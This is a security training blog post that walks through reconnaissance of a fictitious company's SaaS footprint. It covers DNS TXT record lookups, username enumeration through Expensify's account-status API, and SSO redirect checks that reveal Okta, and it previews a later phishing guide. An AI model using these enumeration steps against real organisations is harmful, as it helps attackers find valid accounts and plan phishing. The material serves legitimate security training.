mobile-bg

Identifying Corporate SaaS Attack Surfaces

Published by r4 on Oct 28, 2024

For years, networks and endpoints were the attack surface. Today, cloud apps and identities are the attacker’s land of opportunity.

In this guide we'll step through several examples of reconnaissance techniques for enumerating corporate SaaS environments. We'll target a fictitious company – Yellow Steel – to gather information about which SaaS apps the organization uses, how those apps are configured, and what identities are associated with them. In a follow-on guide, we'll use that information to attempt to gain access to one or more of those applications.

Environment Prep

Do you just want to focus on this SaaS reconnaissance guide? A Chrome-based browser is all you'll need.

Interested in targeting a fictitious company through the entire SaaS kill chain? You can launch your own dedicated SaaS range containing 15 connected applications along with attacker and victim browser-based workspaces using r4 here.

Reconnaissance Overview

We'll focus on three reconnaissance techniques, which are described in detail in Push Security's SaaS attack matrix. Those techniques are:

  1. DNS reconnaissance (ID: SAT1013)
  2. Username enumeration (ID: SAT1038)
  3. SAML enumeration (ID: SAT1031)

To explore the entire SaaS attack matrix, select the link below. SaaS Attack Techniques by Push Security

Apps of Interest

There are a number of app categories that make up the SaaS attack surface; each likely to contain valuable data that organizations want to protect. To keep this guide a digestible length, we've scoped our recon examples to the three listed in bold.

  1. email service providers
  2. expense management
  3. IAM and IdP
  4. CRM
  5. observability
  6. productivity
  7. automation
  8. project management
  9. human resources
  10. Payroll services
  11. ITSM
  12. file storage
  13. DevSecOps
  14. marketing

DNS Reconnaissance to Discover Email Service Providers

Some SaaS apps require ownership verification for a domain as part of the setup process. A common way to verify ownership is to publish a specific string as a DNS TXT record that the SaaS vendor can verify as proof. Querying DNS TXT records can reveal which SaaS apps the target organization might be using. MX and SPF records are also useful in discovering SaaS apps used to send and receive mail for the organization.

Steps

  1. from a local machine browser or an r4-provisioned attacker virtual desktop workspace, open a new Chrome-based browser tab and navigate to your favorite TXT record lookup tool. We like – https://mxtoolbox.com/TXTLookup.aspx

  2. type in Yellow Steel's primary domain name shown below

yellow-steel.cloud

  1. notice the TXT record results referring to Zoho Mail, an email service provider similar to Gmail

TXT Record Results

DNS Recon Video

Username Enumeration to Discover Expense Management User Accounts

When attempting to authenticate to a SaaS app, the login mechanism itself may disclose whether the username/email address is a known/valid account, even if the provided password is incorrect. Since email addresses are commonly used during the authentication process and the domain associated will often give away the organization, checking known valid email address combinations for the target organization will often reveal whether the target organization is using the SaaS app, and could lead to the discovery of valid user accounts.

Imagine we've compiled a list of Yellow Steel employee names and the company's email address format ([first].[last]@yellow-steel.cloud). Let's attempt to discover if Yellow Steel uses a cloud-based expense management application like Expensify.

Yellow Steel employees:

  • Regan Norton
  • Libbie Gallagher
  • Zachary Walter
  • Yash Bonner
  • John Smith

Steps

  1. from a local machine browser or an r4-provisioned attacker virtual desktop workspace, open a new Chrome-based browser tab

  2. right click and select "Inspect" from the menu

  3. in the new pane, select the "Network" tab, then select "Fetch/XHR" beneath the filter section

  4. navigate to https://expensify.com

  5. select "Sign In", then select "Email" from the modal

  6. enter the email address below. Notice the name "John Doe" is not listed as a Yellow Steel employee

[email protected]

  1. Select "the newly populated "GetAccountStatus" API call from the name column

  2. notice the value for the accountExists field is "false"

  3. now select "Back", then select "Email", enter the email address for a Yellow Steel employee shown below, then select "Next"

[email protected]

  1. select the newly populated "GetAccountStatus" API call from the name column

  2. notice the value for the accountExists field is "true", indicating Regan Norton is in fact an Expensify account holder under the Yellow Steel organization

  3. close the "Inspect" pane, but leave your browser tab "as is" for the next section

Username Enum Video

SAML Enumeration to Discover IdP Provider

If SAML is used, adversaries can discover whether a target organization is using a SaaS app and what their SAML provider is by making login attempts using their email domain, or by making login attempts via subdomains or path-based tenants based on the organization name.

  1. in your existing Expensify browser tab, select "Single Sign-on" from the modal

  2. notice you are redirected to an Okta login screen, indicating Yellow Steel uses Okta to manage SSO logins for at least some of their SaaS applications

SAML Enum Video

In the next guide – titled BitM Phishing for Initial Access – we'll step through a browser-in-the-middle phishing example where we impersonate the Expensify and Okta apps to get access to a Yellow Steel employee's Okta dashboard.

The private beta is live. If you are interested contact us.